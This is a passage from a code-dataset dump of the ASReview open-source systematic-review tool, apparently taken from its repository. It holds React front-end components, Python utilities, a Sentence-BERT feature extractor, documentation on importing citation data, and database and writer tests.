{data[\"files\"].map((val, id) => {\n return (\n <MenuItem\n key={val[\"name\"]}\n value={val[\"link\"]}\n disabled={val[\"disabled\"]}\n >\n {val[\"name\"]}\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n )}\n\n {data && data[\"files\"] && (\n <Stack className={classes.root}>\n <LoadingButton\n disabled={!props.url}\n loading={props.isAddingDataset || isLoading}\n onClick={addFile}\n >\n Add\n </LoadingButton>\n </Stack>\n )}\n\n {isError && (\n <InlineErrorHandler\n message={error?.message + \" Use a valid URL or DOI.\"}\n />\n )}\n {props.isAddDatasetError && (\n <InlineErrorHandler\n message={props.addDatasetError?.message + \" Please try again.\"}\n />\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default DatasetFromURL;\n" }, { "alpha_fraction": 0.6273712515830994, "alphanum_fraction": 0.630081295967102, "avg_line_length": 24.44827651977539, "blob_id": "cf808de2029cd34b1c2e6b0c1f668cd92961769a", "content_id": "ec1c678f9ae38fd2c0dcd2a384e85724bbec63a6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 738, "license_type": "permissive", "max_line_length": 66, "num_lines": 29, "path": "/asreview/webapp/src/Components/BoxErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQueryClient } from \"react-query\";\nimport { Button, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n flexDirection: \"column\",\n alignItems: \"center\",\n padding: 48,\n}));\n\nexport default function BoxErrorHandler(props) {\n const queryClient = useQueryClient();\n const resetQuery = () => {\n queryClient.resetQueries(props.queryKey);\n };\n\n return (\n <Root>\n <Typography align=\"center\" sx={{ color: \"text.secondary\" }}>\n {props.error?.message}\n </Typography>\n <Button variant=\"contained\" onClick={resetQuery}>\n Try to Refresh\n </Button>\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.6240636110305786, "alphanum_fraction": 0.6272905468940735, "avg_line_length": 28.614334106445312, "blob_id": "2d8ce7a461ff983a3a13d30b9e510fde16969d6c", "content_id": "a6b9c72b913efc196e8270e137ce4b4aaa74dfeb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 8677, "license_type": "permissive", "max_line_length": 133, "num_lines": 293, "path": "/asreview/utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport functools\nimport os\nimport sys\nimport warnings\nfrom pathlib import Path\nfrom urllib.error import HTTPError\nfrom urllib.parse import urlparse\nfrom urllib.request import urlopen\n\nimport numpy as np\n\nfrom asreview._deprecated import _deprecated_func\n\nif sys.version_info >= (3, 10):\n from importlib.metadata import entry_points as _entry_points\nelse:\n from importlib_metadata import entry_points as _entry_points\n\n\ndef _unsafe_dict_update(default_dict, override_dict):\n \"\"\"\n Using defaults and an overriding dictionary, create a new dictionary.\n This new dictionary has the same values as the default dictionary and\n the same types. Thus, if there are values that are in the overriding\n dictionary, but not in the original, they will be ignored.\n\n Arguments\n ---------\n default_dict: dict\n Starting dictionary with defaults.\n override_dict: dict\n Dictionary with custom values (such as model parameters).\n\n Returns\n -------\n dict\n Merged dictionary.\n \"\"\"\n new_dict = default_dict\n for key in override_dict:\n if key not in default_dict:\n print(f\"Warning: key {key} is being ignored.\")\n\n for key in new_dict:\n if key in override_dict:\n str_val = override_dict[key]\n if isinstance(new_dict[key], bool):\n new_dict[key] = str_val in [\"True\", \"true\", \"T\", \"t\", True]\n else:\n try:\n new_dict[key] = type(new_dict[key])(str_val)\n except TypeError:\n raise TypeError(f\"Error at {key}\")\n return new_dict\n\n\ndef _safe_dict_update(default_dict, override_dict):\n \"\"\"\n Using defaults and an overriding dictionary, create a new dictionary.\n This new dictionary has the same values as the default dictionary.\n Thus, if there are values that are in the overriding\n dictionary, but not in the original, they will be ignored.\n In contrast to the unsafe version, the type should be supplied in the\n default dictionary: key: (value, type).\n\n Arguments\n ---------\n default_dict: dict\n Starting dictionary with defaults.\n override_dict: dict\n Dictionary with custom values (such as model parameters).\n\n Returns\n -------\n dict\n Merged dictionary.\n \"\"\"\n new_dict = {}\n for key in default_dict:\n new_dict[key] = default_dict[key][0]\n\n for key in override_dict:\n if key not in default_dict:\n print(f\"Warning: key {key} is being ignored.\")\n\n for key in new_dict:\n if key in override_dict:\n str_val = override_dict[key]\n type_val = default_dict[key][1]\n if type_val == bool:\n new_dict[key] = str_val in [\"True\", \"true\", \"T\", \"t\"]\n else:\n try:\n new_dict[key] = type_val(str_val)\n except TypeError:\n raise TypeError(f\"Error at {key}\")\n return new_dict\n\n\ndef _deprecated_kwarg(kwarg_map):\n def dec(func):\n 
@functools.wraps(func)\n        def wrapper(*args, **kwargs):\n            new_kwargs = {}\n            for k, v in kwargs.items():\n                if k in kwarg_map:\n                    warnings.warn(f\"Keyword argument '{k}' is deprecated. Use '{kwarg_map[k]}' instead.\", DeprecationWarning)  # noqa\n                new_kwargs[kwarg_map.get(k, k)] = v\n            return func(*args, **new_kwargs)\n        return wrapper\n    return dec\n\n\ndef _get_filename_from_url(url):\n    if not is_url(url):\n        raise ValueError(f\"'{url}' is not a valid URL.\")\n\n    if Path(urlparse(url).path).suffix:\n        return Path(urlparse(url).path).name\n    else:\n        try:\n            return urlopen(url).headers.get_filename()\n        except HTTPError as err:\n            # 308 (Permanent Redirect) not supported\n            # See https://bugs.python.org/issue40321\n            if err.code == 308:\n                return _get_filename_from_url(err.headers.get(\"Location\"))\n            else:\n                raise err\n\n\ndef asreview_path():\n    \"\"\"Get the location where projects are stored.\n\n    Overwrite this location by specifying the ASREVIEW_PATH environment\n    variable.\n    \"\"\"\n    if os.environ.get(\"ASREVIEW_PATH\", None):\n        asreview_path = Path(os.environ[\"ASREVIEW_PATH\"])\n    else:\n        asreview_path = Path(\"~\", \".asreview\").expanduser()\n\n    asreview_path.mkdir(parents=True, exist_ok=True)\n\n    return asreview_path\n\n\ndef get_data_home(data_home=None):\n    \"\"\"Return the path of the ASR data dir.\n\n    This folder is used by some large dataset loaders to avoid downloading the\n    data several times.\n    By default the data dir is set to a folder named 'asr_data' in the\n    user home folder.\n    Alternatively, it can be set by the 'ASR_DATA' environment\n    variable or programmatically by giving an explicit folder path. The '~'\n    symbol is expanded to the user home folder.\n    If the folder does not already exist, it is automatically created.\n\n    Parameters\n    ----------\n    data_home : str | None\n        The path to scikit-learn data dir.\n\n    \"\"\"\n    if data_home is None:\n        data_home = os.environ.get(\"ASR_DATA\", Path(\"~\", \"asr_data\"))\n    data_home = Path(data_home).expanduser()\n\n    if not data_home.exists():\n        data_home.mkdir(parents=True, exist_ok=True)\n\n    return data_home\n\n\ndef format_to_str(obj):\n    \"\"\"Create string from object, concatenate if list.\"\"\"\n    if obj is None:\n        return \"\"\n    res = \"\"\n    if isinstance(obj, list):\n        res = \" \".join(obj)\n    else:\n        res = obj\n    return res\n\n\ndef pretty_format(result):\n    longest_key = max([len(key) for key in result])\n    result_str = \"\"\n    for key, value in result.items():\n        temp_str = \"{{key: <{n}}}: {{value}}\\n\".format(n=longest_key)\n        result_str += temp_str.format(key=key, value=value)\n    return result_str\n\n\ndef is_iterable(i):\n    \"\"\"Check if a variable is iterable, but not a string.\"\"\"\n    try:\n        iter(i)\n        if isinstance(i, str):\n            return False\n        return True\n    except TypeError:\n        return False\n\n\n@_deprecated_func(\n    \"list_model_names is deprecated, \"\n    \"use asreview.models.classifiers.list_classifiers instead\"\n)\ndef list_model_names(group=\"asreview.models\"):\n    # Remove because of bug with unused default value.\n    return list(_entry_points(group=group).names)\n\n\n@_deprecated_kwarg({\"entry_name\": \"group\"})\ndef list_reader_names(group=\"asreview.readers\"):\n    return list(_entry_points(group=group).names)\n\n\n@_deprecated_kwarg({\"entry_name\": \"group\"})\ndef list_writer_names(group=\"asreview.writers\"):\n    return list(_entry_points(group=group).names)\n\n\n@_deprecated_func(\n    \"get_entry_points is deprecated, \"\n    \"use _entry_points(group='asreview.entry_points') instead\"\n)\ndef 
get_entry_points(entry_name=\"asreview.entry_points\"):\n \"\"\"Get the entry points for asreview.\n\n Parameters\n ----------\n entry_name: str\n Name of the submodule. Default \"asreview.entry_points\".\n\n Returns\n -------\n dict:\n Dictionary with the name of the entry point as key\n and the entry point as value.\n \"\"\"\n\n return {entry.name: entry for entry in _entry_points(group=entry_name)}\n\n\ndef is_url(url):\n \"\"\"Check if object is a valid url.\"\"\"\n try:\n result = urlparse(url)\n return all(\n getattr(result, x) not in [b\"\", \"\"] for x in [\"scheme\", \"netloc\", \"path\"])\n except Exception:\n return False\n\n\ndef get_random_state(random_state):\n \"\"\"Create a RandomState instance.\n\n Parameters\n ----------\n random_state: int, numpy.RandomState\n If it is an integer, seed a new random state.\n If it is a RandomState, return it (nop).\n If it is None, return the random state of numpy.\n \"\"\"\n\n if not isinstance(random_state, np.random.RandomState):\n return np.random.RandomState(random_state)\n\n return random_state\n\n\ndef _get_executable():\n \"\"\"Get the Python executable\"\"\"\n\n return sys.executable if sys.executable else \"python\"\n" }, { "alpha_fraction": 0.6800199151039124, "alphanum_fraction": 0.6835033297538757, "avg_line_length": 36.91509246826172, "blob_id": "eacb96c2168e426c2d1c65c789dd46d2a36625fa", "content_id": "2575a4f8221bc1eb49c45749bcdd7038865852e0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4019, "license_type": "permissive", "max_line_length": 88, "num_lines": 106, "path": "/asreview/models/feature_extraction/sbert.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\ntry:\n from sentence_transformers import models\n from sentence_transformers.SentenceTransformer import SentenceTransformer\nexcept ImportError:\n ST_AVAILABLE = False\nelse:\n ST_AVAILABLE = True\n\nfrom asreview.models.feature_extraction.base import BaseFeatureExtraction\n\n\ndef _check_st():\n if not ST_AVAILABLE:\n raise ImportError(\"Install sentence-transformers package to use Sentence BERT.\")\n\n\nclass SBERT(BaseFeatureExtraction):\n \"\"\"Sentence BERT feature extraction technique (``sbert``).\n\n By setting the ``transformer_model`` parameter, you can use other\n transformer models. For example, ``transformer_model='bert-base-nli-stsb-\n large'``. For a list of available models, see the `Sentence BERT\n documentation <https://huggingface.co/sentence-transformers>`__.\n\n Sentence BERT is a sentence embedding model that is trained on a large\n corpus of human written text. It is a fast and accurate model that can\n be used for many tasks.\n\n The huggingface library includes multilingual text classification models. 
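For\n    instance, ``paraphrase-multilingual-mpnet-base-v2`` is one commonly used\n    multilingual sentence-transformers model. 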
If\n your dataset contains records with multiple languages, you can use the\n ``transformer_model`` parameter to select the model that is most suitable\n for your data.\n\n .. note::\n\n This feature extraction technique requires ``sentence_transformers``\n to be installed. Use ``pip install sentence_transformers`` or install\n all optional ASReview dependencies with ``pip install asreview[all]``\n to install the package.\n\n Parameters\n ----------\n transformer_model : str, optional\n The transformer model to use.\n Default: 'all-mpnet-base-v2'\n is_pretrained_SBERT: boolean, optional\n Default: True\n pooling_mode: str, optional\n Pooling mode to get sentence embeddings from word embeddings\n Default: 'mean'\n Other options available are 'mean', 'max' and 'cls'.\n Only used if is_pretrained_SBERT=False\n mean: Uses mean pooling of word embeddings\n max: Uses max pooling of word embeddings\n cls: Uses embeddings of [CLS] token as sentence embeddings\n \"\"\"\n\n name = \"sbert\"\n label = \"Sentence BERT\"\n\n def __init__(\n self,\n *args,\n transformer_model=\"all-mpnet-base-v2\",\n is_pretrained_sbert=True,\n pooling_mode=\"mean\",\n **kwargs\n ):\n super(SBERT, self).__init__(*args, **kwargs)\n self.transformer_model = transformer_model\n self.is_pretrained_sbert = is_pretrained_sbert\n self.pooling_mode = pooling_mode\n\n def transform(self, texts):\n _check_st()\n\n if self.is_pretrained_sbert:\n model = SentenceTransformer(self.transformer_model)\n else:\n # If transformer_model is not a pretrained sentence transformer model,\n # add a pooling layer to get the pooled sentence embeddings from the\n # word embeddings\n word_embedding_model = models.Transformer(self.transformer_model)\n pooling_layer = models.Pooling(\n word_embedding_model.get_word_embedding_dimension(),\n pooling_mode=self.pooling_mode,\n )\n model = SentenceTransformer(modules=[word_embedding_model, pooling_layer])\n print(\"Encoding texts using sbert, this may take a while...\")\n X = model.encode(texts, show_progress_bar=True)\n\n return X\n" }, { "alpha_fraction": 0.5236414670944214, "alphanum_fraction": 0.5263231992721558, "avg_line_length": 45.59868240356445, "blob_id": "53c6dfe00da02b2d46697bd4c130245e3eb038ec", "content_id": "491bb65c1954b20e38fd242996a2424f4e1db125", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7145, "license_type": "permissive", "max_line_length": 124, "num_lines": 152, "path": "/docs/source/data.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Prepare your data\n=================\n\nASReview LAB requires a dataset containing a set of textual records (e.g.,\ntitles and abstracts of scientific papers, newspaper articles, or policy\nreports) obtained via a systematic search. The goal is to review all records\nsystematically using predetermined inclusion and exclusion criteria. Also, it\nshould be expected that only a fraction of the records in the dataset is\nrelevant.\n\nDatasets can be unlabeled as well as :ref:`data_labeled:Partially labeled\ndata` and :ref:`data_labeled:Fully labeled data`. The latter ones are useful\nin the Simulation and Exploration mode. See :ref:`project_create:Project\nmodes` for more information.\n\nThe easiest way to obtain a dataset is via a search engine or with the help of\na reference manager. See :ref:`data:Compatibility` for reference managers\nexport formats supported by ASReview. 
For more information about the format of\nthe dataset, see :doc:`data_format`.\n\nHigh-quality data\n-----------------\n\nThe algorithms of ASReview LAB work best with high-quality datasets. A\nhigh-quality dataset is a dataset with duplicate records removed, and the data\nis complete. Complete data implies that titles and abstracts are available for\nall (or most) records. See the ASReview blog `Importance of Abstracts\n<https://asreview.ai/blog/the-importance-of-abstracts/>`_ for more ideas on\ncomposing a high-quality dataset.\n\nCompatibility\n-------------\n\nCitation Managers\n~~~~~~~~~~~~~~~~~\n\nThe following table provides an overview of export files from citation\nmanagers which are accepted by ASReview.\n\n+-------------------------------+----------+----------+----------+\n|                               | **.ris** | **.csv** | **.xlsx**|\n+-------------------------------+----------+----------+----------+\n| **EndNote**                   | ✅        | N/A      | N/A      |\n+-------------------------------+----------+----------+----------+\n| **Excel**                     | N/A      | ✅        | ✅        |\n+-------------------------------+----------+----------+----------+\n| **Mendeley**                  | ✅        | N/A      | N/A      |\n+-------------------------------+----------+----------+----------+\n| **Refworks**                  | ✅        | N/A      | N/A      |\n+-------------------------------+----------+----------+----------+\n| **Zotero**                    | ✅        | ✅        | N/A      |\n+-------------------------------+----------+----------+----------+\n\n- ✅ = The data can be exported from the citation manager and imported in ASReview.\n- N/A = This format does not exist.\n\n\nRIS files used for screening in ASReview LAB can be imported back into the\nreference software, and the decision labels can be found in the notes field.\nFor more information, see this `instruction video\n<https://www.youtube.com/watch?v=-Rw291AE2OI>`_.\n\nNote: the RIS pipeline is extensively tested with the reference managers\nZotero and EndNote. It might also work with other reference managers, but\nthese are currently not officially supported.\n\n\n.. note::\n\n    When using EndNote, use the following steps to export a RIS file (.ris):\n\n    - In EndNote, click on the style selection dropdown menu from the main EndNote toolbar.\n    - Click \"Select Another Style\".\n    - Browse to RefMan (RIS) Export and click \"Choose\".\n    - Click on the file menu and select \"Export\".\n    - Pick a name and location for the text file.\n    - Choose the output format RefMan (RIS) Export and click \"Save\".\n\n\n\nSearch Engines\n~~~~~~~~~~~~~~\n\nWhen using search engines, it is often possible to store the articles of\ninterest in a list or folder within the search engine itself. Thereafter, you\ncan choose from different ways to export the list/folder. 
When you have the\noption to select parts of the citation to be exported, choose the option which\nwill provide the most information.\n\nThe export files of the following search engines have been tested for their\nacceptance in ASReview:\n\n==================== ======== ======== ======== =========\n\\                    **.ris** **.tsv** **.csv** **.xlsx**\n==================== ======== ======== ======== =========\n**CINAHL (EBSCO)**   ✅        N/A      X        N/A\n**Cochrane**         ✅        N/A      ✅        N/A\n**Embase**           ✅        N/A      ✅        ✅\n**Eric (Ovid)**      ✅*       N/A      N/A      N/A\n**Psychinfo (Ovid)** ✅*       N/A      N/A      N/A\n**Pubmed**           X        N/A      X        N/A\n**Scopus**           ✅        N/A      ✅        N/A\n**Web of Science**   ✅        N/A      N/A      N/A\n==================== ======== ======== ======== =========\n\n- ✅ = The data can be exported from the search engine and imported in ASReview.\n- N/A = This format does not exist.\n- X = Not supported (see :ref:`data_format:Data format` for other options).\n\n\\* Make sure to uncheck all inclusion options (e.g., \"URL\") when exporting from Ovid.\n\n.. tip::\n\n    If the export of your search engine is not accepted in ASReview, you can\n    also try the following: import the search engine file first into one of\n    the citation managers mentioned in the previous part, and export it again\n    into a format that is accepted by ASReview.\n\nSystematic Review Software\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThere are several software packages available for systematic reviewing, see\nhttps://www.nature.com/articles/s42256-020-00287-7. Some of them use machine\nlearning, while others focus on screening and management. The overview below\nshows alternative software programs and their compatibility with ASReview.\n\n+-----------------+-----------+----------+----------+----------+\n|                 | **.ris**  | **.tsv** | **.csv** | **.xlsx**|\n|                 |           |          |          |          |\n+-----------------+-----------+----------+----------+----------+\n| **Abstrackr**   | ✅         | N/A      | ✅        | N/A      |\n+-----------------+-----------+----------+----------+----------+\n| **Covidence**\\* | ✅         | N/A      | ✅        | N/A      |\n+-----------------+-----------+----------+----------+----------+\n| **Distiller**   | X         | N/A      | ✅\\**     | ✅\\**     |\n+-----------------+-----------+----------+----------+----------+\n|**EPPI-reviewer**| ✅         | N/A      | N/A      | X        |\n+-----------------+-----------+----------+----------+----------+\n| **Rayyan**      | ✅         | N/A      | ✅        | N/A      |\n+-----------------+-----------+----------+----------+----------+\n|**Robotreviewer**| N/A       | N/A      | N/A      | N/A      |\n+-----------------+-----------+----------+----------+----------+\n\n- ✅ = The data can be exported from the third-party review software and imported in ASReview.\n- N/A = This format does not exist.\n- X = Not supported.\n\n\\* When using Covidence it is possible to export articles in ``.ris`` format for different citation managers,\nsuch as EndNote, Mendeley, Refworks and Zotero. All of these are compatible with ASReview.\n\n\\** When exporting from Distiller, if the following error occurs ``Unable to parse string \"Yes (include)\" at position 0``,\nset the ``sort references by`` to ``Authors``. 
Then the data can be imported in ASReview.\n\n\n" }, { "alpha_fraction": 0.6752655506134033, "alphanum_fraction": 0.6818411946296692, "avg_line_length": 33.08620834350586, "blob_id": "948f7f411c4452419958cc0fbeb4ee78b73c92e7", "content_id": "672cfb91258754f656d089e27fbbe6e6e7c91064", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1977, "license_type": "permissive", "max_line_length": 79, "num_lines": 58, "path": "/tests/test_writers.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nfrom pytest import mark\n\nfrom asreview import ASReviewData\n\n\[email protected](\"test_file\", [(\"baseline_tag-notes_labels.ris\")])\ndef test_asreview_labels_ris(test_file, tmpdir):\n fp_in = Path(\"tests\", \"demo_data\", test_file)\n asr_data = ASReviewData.from_file(fp_in)\n\n tmp_ris_fp_out = Path(tmpdir, \"tmp_labels.ris\")\n asr_data.to_file(tmp_ris_fp_out)\n asr_data_diff = ASReviewData.from_file(tmp_ris_fp_out)\n\n # Check if input file matches the export file\n assert list(asr_data.title) == list(asr_data_diff.title)\n assert list(asr_data.labels) == list(asr_data_diff.labels)\n\n\[email protected](\"test_file\", [(\"baseline_tag-notes.ris\")])\ndef test_asreview_notes_ris(test_file, tmpdir):\n fp_in = Path(\"tests\", \"demo_data\", test_file)\n asr_data = ASReviewData.from_file(fp_in)\n\n tmp_ris_fp_out = Path(tmpdir, \"tmp_notes.ris\")\n asr_data.to_file(tmp_ris_fp_out)\n\n asr_data_diff = ASReviewData.from_file(tmp_ris_fp_out)\n\n # Check if input file matches the export file\n assert list(asr_data.title) == list(asr_data_diff.title)\n assert list(asr_data.notes) == list(asr_data_diff.notes)\n\n\[email protected](\"test_file\", [(\"ris_issue_992.txt\"), (\"ris_issue_1099.txt\")])\ndef test_asreview_ris(test_file, tmpdir):\n fp_in = Path(\"tests\", \"demo_data\", test_file)\n asr_data = ASReviewData.from_file(fp_in)\n\n tmp_ris_fp_out = Path(tmpdir, \"tmp_ris.ris\")\n asr_data.to_file(tmp_ris_fp_out)\n\n asr_data_diff = ASReviewData.from_file(tmp_ris_fp_out)\n\n # Check if input file matches the export file\n assert list(asr_data.title) == list(asr_data_diff.title)\n\n\ndef test_write_numpy_arrays():\n # This test should catch cases where two numpy arrays\n # are to be evaluated in boolean context. Error is as follows:\n # \"The truth value of an array with more than one element is ambiguous.\n # Use a.any() or a.all()\"\n ###\n # For ris writer, a relevant bug was fixed with commit 70d9497\n pass\n" }, { "alpha_fraction": 0.6689322590827942, "alphanum_fraction": 0.6726595163345337, "avg_line_length": 28.810457229614258, "blob_id": "2f4756548dec5b5f8094a58dbb075bcb2411e909", "content_id": "8596e233d4d1fdba20e98e78c857e5418f384028", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4561, "license_type": "permissive", "max_line_length": 86, "num_lines": 153, "path": "/asreview/webapp/run_model.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport logging\nimport sys\nfrom pathlib import Path\n\nfrom filelock import FileLock\nfrom filelock import Timeout\n\nfrom asreview.models.balance import get_balance_model\nfrom asreview.models.classifiers import get_classifier\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.query import get_query_model\nfrom asreview.project import ASReviewProject\nfrom asreview.project import open_state\nfrom asreview.review.base import BaseReview\nfrom asreview.webapp.io import read_data\n\n\ndef get_lab_reviewer(\n as_data,\n project,\n embedding_fp=None,\n verbose=0,\n prior_idx=None,\n prior_record_id=None,\n seed=None,\n **kwargs,\n):\n \"\"\"Get a review object from arguments.\"\"\"\n\n if len(as_data) == 0:\n raise ValueError(\"Supply at least one dataset\" \" with at least one record.\")\n\n with open_state(project) as state:\n settings = state.settings\n\n # TODO: Set random seed.\n # Initialize models.\n # random_state = get_random_state(seed)\n classifier_model = get_classifier(settings.model)\n query_model = get_query_model(settings.query_strategy)\n balance_model = get_balance_model(settings.balance_strategy)\n feature_model = get_feature_model(settings.feature_extraction)\n\n # LSTM models need embedding matrices.\n if classifier_model.name.startswith(\"lstm-\"):\n classifier_model.embedding_matrix = feature_model.get_embedding_matrix(\n as_data.texts, embedding_fp\n )\n\n # prior knowledge\n if (\n prior_idx is not None\n and prior_record_id is not None\n and len(prior_idx) > 0\n and len(prior_record_id) > 0\n ):\n raise ValueError(\"Not possible to provide both prior_idx and prior_record_id\")\n\n reviewer = BaseReview(\n as_data,\n project,\n model=classifier_model,\n query_model=query_model,\n balance_model=balance_model,\n feature_model=feature_model,\n **kwargs,\n )\n return reviewer\n\n\ndef train_model(project):\n \"\"\"Add the new labels to the review and do the modeling.\n\n It uses a lock to ensure only one model is running at the same time.\n \"\"\"\n\n logging.info(f\"Project {project.project_path} - Train a new model for project\")\n\n # Lock so that only one training run is running at the same time.\n lock = FileLock(Path(project.project_path, \"training.lock\"), timeout=0)\n\n with lock:\n\n # Check if there are new labeled records.\n with open_state(project.project_path) as state:\n exist_new_labeled_records = state.exist_new_labeled_records\n\n if exist_new_labeled_records:\n # collect command line arguments and pass them to the reviewer\n as_data = read_data(project)\n\n reviewer = get_lab_reviewer(as_data, project)\n\n # Train the model.\n reviewer.train()\n\n\ndef main(argv):\n # parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"project_path\", type=str, help=\"Project id\")\n parser.add_argument(\n \"--output_error\",\n dest=\"output_error\",\n action=\"store_true\",\n help=\"Save training error message to 
file.\",\n )\n parser.add_argument(\n \"--first_run\",\n dest=\"first_run\",\n action=\"store_true\",\n help=\"After first run, status is updated.\",\n )\n args = parser.parse_args(argv)\n\n project = ASReviewProject(args.project_path)\n\n try:\n train_model(project)\n\n # change the project status to review\n project.update_review(status=\"review\")\n\n except Timeout:\n logging.debug(\"Another iteration is training\")\n\n except Exception as err:\n # save the error to the project\n project.set_error(err, save_error_message=args.output_error)\n\n # raise the error for full traceback\n raise err\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n" }, { "alpha_fraction": 0.5774706602096558, "alphanum_fraction": 0.5787269473075867, "avg_line_length": 28.850000381469727, "blob_id": "544f01ceb2dde83e21a740e78e23dcc0e46fea4f", "content_id": "75e6d9c4facf4a53ef0650306d2aa8f239d51266", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2388, "license_type": "permissive", "max_line_length": 105, "num_lines": 80, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/EndCollaboration.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useNavigate, useParams } from \"react-router-dom\";\nimport { TeamAPI } from \"../../api/index.js\";\nimport useAuth from \"../../hooks/useAuth\";\nimport { Box, Button, Stack } from \"@mui/material\";\nimport { InlineErrorHandler } from \"../../Components\";\nimport { ConfirmationDialog } from \".\";\n\nconst EndCollaboration = (props) => {\n const [dialogOpen, setDialogOpen] = React.useState(false);\n const { auth } = useAuth();\n const navigate = useNavigate();\n const { project_id } = useParams();\n const [errorMessage, setErrorMessage] = React.useState(undefined);\n\n const handleOpenConfirmationDialog = () => {\n setDialogOpen(true);\n };\n\n const handleCloseConfirmationDialog = () => {\n setDialogOpen(false);\n };\n\n const handleEndCollaboration = () => {\n setDialogOpen(false);\n TeamAPI.endCollaboration(project_id, auth.id)\n .then((data) => {\n if (data.success) {\n navigate(\"/projects\");\n } else {\n let message = \"Could not end the collaboration -- DB failure\";\n console.error(message);\n setErrorMessage(message);\n }\n })\n .catch((err) => {\n let message = `Could not end the collaboration: ${err.message} (${err.code})`;\n console.error(message, err);\n setErrorMessage(message);\n });\n };\n\n return (\n <>\n <Box>\n <Box>\n <h2>You are collaborating in this project</h2>\n <p>\n If you would like to end this collaboration, please click on the\n button below:\n </p>\n <Button\n variant=\"contained\"\n color=\"error\"\n onClick={handleOpenConfirmationDialog}\n >\n Remove me from this Team\n </Button>\n {errorMessage !== undefined && (\n <Stack sx={{ padding: 5 }}>\n <InlineErrorHandler message={errorMessage} />\n </Stack>\n )}\n </Box>\n </Box>\n\n <ConfirmationDialog\n open={dialogOpen}\n title={`Removal from project \"${project_id}\"`}\n contents={\n \"Are you sure? 
You will remove yourself from this project if you click on the 'Remove' button.\"\n }\n handleCancel={handleCloseConfirmationDialog}\n handleConfirm={handleEndCollaboration}\n />\n </>\n );\n};\n\nexport default EndCollaboration;\n" }, { "alpha_fraction": 0.6705039143562317, "alphanum_fraction": 0.6794092059135437, "avg_line_length": 28.512821197509766, "blob_id": "654aaabebcce2baca14b5084da9ba7d73f84b03e", "content_id": "73c749144148f2a5b5abc0959c07e20dc32dd050", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4604, "license_type": "permissive", "max_line_length": 77, "num_lines": 156, "path": "/asreview/webapp/tests/test_database_and_models/test_project_model.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nimport pytest\nfrom sqlalchemy.exc import IntegrityError\n\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.utils import asreview_path\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.models import Project\n\n# NOTE: projects are created from a user account\n\n# #############\n# CREATE\n# #############\n\n\n# test uniqueness of project id\ndef test_uniqueness_of_project_id(user):\n project_id = \"my-project\"\n crud.create_project(DB, user, Project(project_id=project_id))\n assert crud.count_projects() == 1\n with pytest.raises(IntegrityError):\n crud.create_project(DB, user, Project(project_id=project_id))\n\n\n# insert a project successfully\ndef test_inserting_project(user):\n project_id = \"my-project\"\n project = Project(project_id=project_id)\n crud.create_project(DB, user, project)\n assert crud.count_projects() == 1\n # get project\n project = crud.last_project()\n assert project.project_id == project_id\n assert project.owner_id == user.id\n\n\n# #############\n# DELETE\n# #############\n\n\n# deleting a project won't delete its owner\ndef test_not_delete_user_after_deletion_project(user):\n crud.create_project(DB, user, Project(project_id=\"project\"))\n assert crud.count_users() == 1\n assert 